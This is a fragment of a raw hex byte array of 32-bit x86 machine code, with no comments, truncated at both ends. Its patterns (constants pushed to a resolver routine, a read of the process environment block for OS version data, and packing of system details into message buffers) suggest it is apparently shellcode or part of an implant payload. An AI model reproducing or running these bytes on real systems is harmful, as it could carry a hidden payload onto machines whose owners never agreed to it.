xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0xE7,0x84,0xCD,0x0A,0xE8,0x03,0xF9,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0xAA,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x37,0x04,0x96,0x36,0xE8,0xE2,0xF8,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x89,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x79,0x5C,0x2D,0x7A,0xE8,0xC1,0xF8,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x68,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x8F,0xCC,0x1A,0xCA,0xE8,0xA0,0xF8,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x47,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x68,0x19,0xD6,0x26,0x0C,0xE8,0x7F,0xF8,0xFF,0xFF,0x5B,0x50,0x53,0xE8,0x26,0xF8,0xFF,0xFF,0x83,0xC4,0x04,0x5B,0x89,0xE2,0x83,0xEA,0x04,0xFF,0xD3,0xC3,0x90,0x0F,0x0B,0x90,0x55,0x89,0xE5,0x83,0xEC,0x28,0x8B,0x45,0x08,0x8B,0x40,0x04,0x89,0xC2,0x8B,0x45,0x0C,0x01,0xD0,0x89,0x45,0xF4,0x8B,0x45,0x14,0x89,0x44,0x24,0x08,0x8B,0x45,0x10,0x89,0x44,0x24,0x04,0x8B,0x45,0xF4,0x89,0x04,0x24,0xE8,0x1D,0x37,0x00,0x00,0x90,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0x8B,0x45,0x08,0x8B,0x50,0x08,0x8B,0x45,0x10,0x01,0xD0,0x89,0x45,0xF4,0x8B,0x45,0x08,0x8B,0x40,0x08,0x39,0x45,0xF4,0x73,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x43,0x8B,0x45,0x08,0x8B,0x40,0x0C,0x39,0x45,0xF4,0x72,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x31,0x8B,0x45,0x08,0x8B,0x40,0x08,0x8B,0x55,0x10,0x89,0x54,0x24,0x0C,0x8B,0x55,0x0C,0x89,0x54,0x24,0x08,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x73,0xFF,0xFF,0xFF,0x8B,0x45,0x08,0x8B,0x55,0xF4,0x89,0x50,0x08,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x68,0xB9,0x00,0x00,0x00,0x00,0xB8,0x20,0x00,0x00,0x00,0x83,0xE0,0xFC,0x89,0xC2,0xB8,0x00,0x00,0x00,0x00,0x89,0x4C,0x05,0xD4,0x83,0xC0,0x04,0x39,0xD0,0x72,0xF5,0x8B,0x45,0x08,0x8B,0x40,0x10,0x89,0x45,0xD4,0x8B,0x45,0x08,0x0F,0xB7,0x40,0x14,0x66,0x89,0x45,0xD8,0x8B,0x45,0x08,0x0F,0xB7,0x40,0x16,0x66,0x89,0x45,0xDA,0xC7,0x45,0xDC,0x03,0x00,0x00,0x00,0xC7,0x45,0xE0,0x20,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xD4,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x0F,0xB7,0x45,0xD8,0x66,0x89,0x02,0x83,0x45,0xF4,0x02,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x0F,0xB7,0x45,0xDA,0x66,0x89,0x02,0x83,0x45,0xF4,0x02,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xDC,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xE0,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xE4,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xE8,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xEC,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xB4,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0xF0,0x89,0x02,0xC7,0x44,0x24,0x08,0x20,0x00,0x00,0x00,0x8D,0x45,0xB4,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x35,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x28,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8D,0x55,0xE8,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0x0C,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xE8,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0x10,0x89,0x02,0x83,0x45,0xF4,0x04,0x8D,0x55,0xE8,0x8B,0x45,0xF4,0x01,0xC2,0x8B,0x45,0x14,0x89,0x02,0xC7,0x44,0x24,0x08,0x0C,0x00,0x00,0x00,0x8D,0x45,0xE8,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xB8,0xFD,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x83,0xEC,0x48,0xC7,0x45,0xEC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0xC7,0x45,0xEC,0x07,0x00,0x00,0x00,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF4,0x00,0x00,0x00,0x00,0x8B,0x45,0xEC,0x89,0x44,0x24,0x04,0x8B,0x45,0xF0,0x89,0x44,0x24,0x08,0x8B,0x45,0xF4,0x89,0x44,0x24,0x0C,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x33,0xFF,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAF,0x00,0x00,0x00,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xC7,0x45,0xE0,0x04,0x00,0x00,0x00,0xC7,0x45,0xE4,0x00,0x00,0x00,0x00,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x8B,0x45,0xE0,0x89,0x44,0x24,0x04,0x8B,0x45,0xE4,0x89,0x44,0x24,0x08,0x8B,0x45,0xE8,0x89,0x44,0x24,0x0C,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xDB,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x5A,0xC7,0x45,0xD4,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD4,0x09,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x8B,0x45,0xD4,0x89,0x44,0x24,0x04,0x8B,0x45,0xD8,0x89,0x44,0x24,0x08,0x8B,0x45,0xDC,0x89,0x44,0x24,0x0C,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x86,0xFE,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x05,0xB8,0x01,0x00,0x00,0x00,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x81,0xEC,0xC4,0x00,0x00,0x00,0x8D,0x55,0x9C,0xB8,0x00,0x00,0x00,0x00,0xB9,0x0E,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0xC7,0x45,0xD8,0x30,0x00,0x00,0x00,0x8B,0x45,0xD8,0x64,0x8B,0x00,0x89,0x45,0xD4,0x8B,0x45,0xD4,0x89,0x45,0xF4,0x8B,0x45,0xF4,0x05,0xA4,0x00,0x00,0x00,0x89,0x45,0xF0,0x8B,0x45,0xF4,0x05,0xA8,0x00,0x00,0x00,0x89,0x45,0xEC,0x8B,0x45,0xF4,0x05,0xAC,0x00,0x00,0x00,0x89,0x45,0xE8,0x8B,0x45,0xF4,0x05,0xB0,0x00,0x00,0x00,0x89,0x45,0xE4,0x8B,0x45,0xF4,0x05,0xF0,0x01,0x00,0x00,0x89,0x45,0xE0,0x66,0xC7,0x45,0x9C,0x00,0x00,0x66,0xC7,0x45,0x9E,0x00,0x00,0x66,0xC7,0x45,0xA0,0x00,0x00,0xC6,0x45,0xA2,0x00,0xC6,0x45,0xA3,0x01,0x8B,0x45,0xF0,0x8B,0x00,0x89,0x45,0xA4,0x8B,0x45,0xEC,0x8B,0x00,0x89,0x45,0xA8,0x8B,0x45,0xE8,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x89,0x45,0xAC,0x8B,0x45,0xE4,0x8B,0x00,0x89,0x45,0xB0,0xC7,0x45,0xB4,0x00,0x00,0x00,0x00,0x66,0xC7,0x45,0xB8,0x00,0x00,0x66,0xC7,0x45,0xBA,0x00,0x00,0xC7,0x45,0xBC,0x00,0x00,0x00,0x00,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0xC7,0x45,0xC4,0x00,0x00,0x00,0x00,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xCC,0x00,0x00,0x00,0x00,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0xC7,0x45,0x98,0x38,0x00,0x00,0x00,0xC7,0x85,0x60,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x64,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x68,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x6C,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x70,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x74,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x78,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x7C,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0x80,0x00,0x00,0x00,0x00,0xC7,0x45,0x84,0x00,0x00,0x00,0x00,0xC7,0x45,0x88,0x00,0x00,0x00,0x00,0xC7,0x45,0x8C,0x00,0x00,0x00,0x00,0xC7,0x45,0x90,0x00,0x00,0x00,0x00,0xC7,0x45,0x94,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB7,0x45,0x9C,0x66,0x89,0x02,0x83,0x45,0xDC,0x02,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB7,0x45,0x9E,0x66,0x89,0x02,0x83,0x45,0xDC,0x02,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB7,0x45,0xA0,0x66,0x89,0x02,0x83,0x45,0xDC,0x02,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB6,0x45,0xA2,0x88,0x02,0x83,0x45,0xDC,0x01,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB6,0x45,0xA3,0x88,0x02,0x83,0x45,0xDC,0x01,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xA4,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xA8,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xAC,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xB0,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xB4,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB7,0x45,0xB8,0x66,0x89,0x02,0x83,0x45,0xDC,0x02,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x0F,0xB7,0x45,0xBA,0x66,0x89,0x02,0x83,0x45,0xDC,0x02,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xBC,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xC0,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xC4,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xC8,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xCC,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x60,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x45,0xD0,0x89,0x02,0x8B,0x45,0x08,0x8B,0x40,0x08,0x89,0x85,0x5C,0xFF,0xFF,0xFF,0x8B,0x45,0x98,0x89,0x44,0x24,0x08,0x8D,0x85,0x60,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x94,0xF9,0xFF,0xFF,0x85,0xC0,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0xE6,0x00,0x00,0x00,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x45,0x98,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x24,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x32,0xF9,0xFF,0xFF,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x85,0x5C,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x08,0xC7,0x44,0x24,0x04,0x28,0x00,0x00,0x00,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x0D,0xF9,0xFF,0xFF,0x8B,0x45,0x08,0x8B,0x40,0x08,0x89,0x85,0x58,0xFF,0xFF,0xFF,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xC0,0x89,0x85,0x54,0xFF,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x04,0x00,0x00,0x00,0x8D,0x85,0x54,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x07,0xF9,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x5C,0x8B,0x45,0xE0,0x0F,0xB7,0x00,0x0F,0xB7,0xD0,0x8B,0x45,0xE0,0x8B,0x40,0x04,0x89,0x54,0x24,0x08,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xDA,0xF8,0xFF,0xFF,0x85,0xC0,0x75,0x07,0xB8,0x00,0x00,0x00,0x00,0xEB,0x2F,0x8B,0x85,0x5C,0xFF,0xFF,0xFF,0x8D,0x50,0x18,0xC7,0x44,0x24,0x0C,0x04,0x00,0x00,0x00,0x8D,0x85,0x58,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x08,0x89,0x54,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x73,0xF8,0xFF,0xFF,0xB8,0x01,0x00,0x00,0x00,0x8B,0x7D,0xFC,0xC9,0xC3,0x55,0x89,0xE5,0x57,0x56,0x53,0x81,0xEC,0x5C,0x01,0x00,0x00,0x8D,0x45,0x94,0xBB,0x20,0x70,0x88,0x6C,0xBA,0x12,0x00,0x00,0x00,0x89,0xC7,0x89,0xDE,0x89,0xD1,0xF3,0xA5,0x8B,0x45,0x08,0x8B,0x00,0xC7,0x44,0x24,0x0C,0x01,0x00,0x00,0x00,0xC7,0x44,0x24,0x08,0x12,0x00,0x00,0x00,0x8D,0x55,0x94,0x89,0x54,0x24,0x04,0x89,0x04,0x24,0xE8,0x1C,0xE9,0xFF,0xFF,0x89,0x45,0xE0,0x83,0x7D,0xE0,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x9A,0x05,0x00,0x00,0x8B,0x45,0xE0,0x89,0x45,0xE4,0xC7,0x45,0x90,0x00,0x00,0x00,0x00,0xE9,0xE5,0x00,0x00,0x00,0x8B,0x45,0x90,0x83,0xC0,0x01,0x89,0x45,0x90,0x8B,0x45,0x08,0x8B,0x50,0x08,0x8B,0x45,0xE4,0x89,0x90,0x14,0x02,0x00,0x00,0x8B,0x45,0xE4,0x83,0xC0,0x14,0xC7,0x44,0x24,0x04,0x00,0x02,0x00,0x00,0x89,0x04,0x24,0xE8,0x0D,0x2D,0x00,0x00,0x89,0x85,0x18,0xFF,0xFF,0xFF,0x8B,0x85,0x18,0xFF,0xFF,0xFF,0x83,0xC0,0x01,0x89,0x85,0x18,0xFF,0xFF,0xFF,0x8B,0x85,0x18,0xFF,0xFF,0xFF,0x01,0xC0,0x89,0x85,0x18,0xFF,0xFF,0xFF,0xC7,0x44,0x24,0x08,0x04,0x00,0x00,0x00,0x8D,0x85,0x18,0xFF,0xFF,0xFF,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0xC3,0xF7,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x20,0x02,0x00,0x00,0x8B,0x45,0xE0,0x89,0x04,0x24,0xE8,0x52,0xE1,0xFF,0xFF,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xF2,0x04,0x00,0x00,0x8B,0x85,0x18,0xFF,0xFF,0xFF,0x8B,0x55,0xE4,0x83,0xC2,0x14,0x89,0x44,0x24,0x08,0x89,0x54,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x7C,0xF7,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x20,0x02,0x00,0x00,0x8B,0x45,0xE0,0x89,0x04,0x24,0xE8,0x0B,0xE1,0xFF,0xFF,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0xAB,0x04,0x00,0x00,0x8B,0x45,0xE4,0x8B,0x00,0x89,0x45,0xE4,0x83,0x7D,0xE4,0x00,0x0F,0x85,0x11,0xFF,0xFF,0xFF,0x8B,0x45,0x08,0x8B,0x40,0x08,0x89,0x45,0x8C,0xC7,0x44,0x24,0x08,0x04,0x00,0x00,0x00,0x8D,0x45,0x90,0x89,0x44,0x24,0x04,0x8B,0x45,0x08,0x89,0x04,0x24,0xE8,0x1F,0xF7,0xFF,0xFF,0x85,0xC0,0x75,0x24,0xC7,0x44,0x24,0x04,0x20,0x02,0x00,0x00,0x8B,0x45,0xE0,0x89,0x04,0x24,0xE8,0xAE,0xE0,0xFF,0xFF,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0xE9,0x4E,0x04,0x00,0x00,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x1B,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0x8B,0x45,0xE0,0x89,0x45,0xE4,0xE9,0xCC,0x03,0x00,0x00,0x8D,0x95,0xA8,0xFE,0xFF,0xFF,0xB8,0x00,0x00,0x00,0x00,0xB9,0x1C,0x00,0x00,0x00,0x89,0xD7,0xF3,0xAB,0x8B,0x45,0xE4,0x8B,0x50,0x0C,0x8B,0x40,0x08,0xBA,0x00,0x00,0x00,0x00,0x89,0x85,0xA8,0xFE,0xFF,0xFF,0x89,0x95,0xAC,0xFE,0xFF,0xFF,0x8B,0x45,0xE4,0x8B,0x40,0x10,0x89,0x85,0xB0,0xFE,0xFF,0xFF,0x8B,0x45,0xE4,0x8B,0x80,0x1C,0x02,0x00,0x00,0x89,0x85,0xB4,0xFE,0xFF,0xFF,0x8B,0x45,0xE4,0x8B,0x80,0x18,0x02,0x00,0x00,0x89,0x85,0xB8,0xFE,0xFF,0xFF,0x8B,0x45,0xE4,0x8B,0x80,0x14,0x02,0x00,0x00,0x89,0x85,0xBC,0xFE,0xFF,0xFF,0xC7,0x85,0xC0,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xC4,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xC8,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xCC,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xD0,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xD4,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xD8,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xDC,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xE0,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xE4,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xE8,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xEC,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xF0,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xF4,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xF8,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0xFC,0xFE,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x00,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x08,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x0C,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x10,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x85,0x14,0xFF,0xFF,0xFF,0x00,0x00,0x00,0x00,0xC7,0x45,0xDC,0x00,0x00,0x00,0x00,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x8D,0x0C,0x02,0x8B,0x85,0xA8,0xFE,0xFF,0xFF,0x8B,0x95,0xAC,0xFE,0xFF,0xFF,0x89,0x01,0x89,0x51,0x04,0x83,0x45,0xDC,0x08,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xB0,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xB4,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xB8,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xBC,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xC0,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xC4,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xC8,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xCC,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xD0,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xD4,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xD8,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xDC,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xE0,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xE4,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xE8,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xEC,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xF0,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xF4,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xF8,0xFE,0xFF,0xFF,0x89,0x02,0x83,0x45,0xDC,0x04,0x8D,0x95,0x20,0xFF,0xFF,0xFF,0x8B,0x45,0xDC,0x01,0xC2,0x8B,0x85,0xFC,0xFE,0xF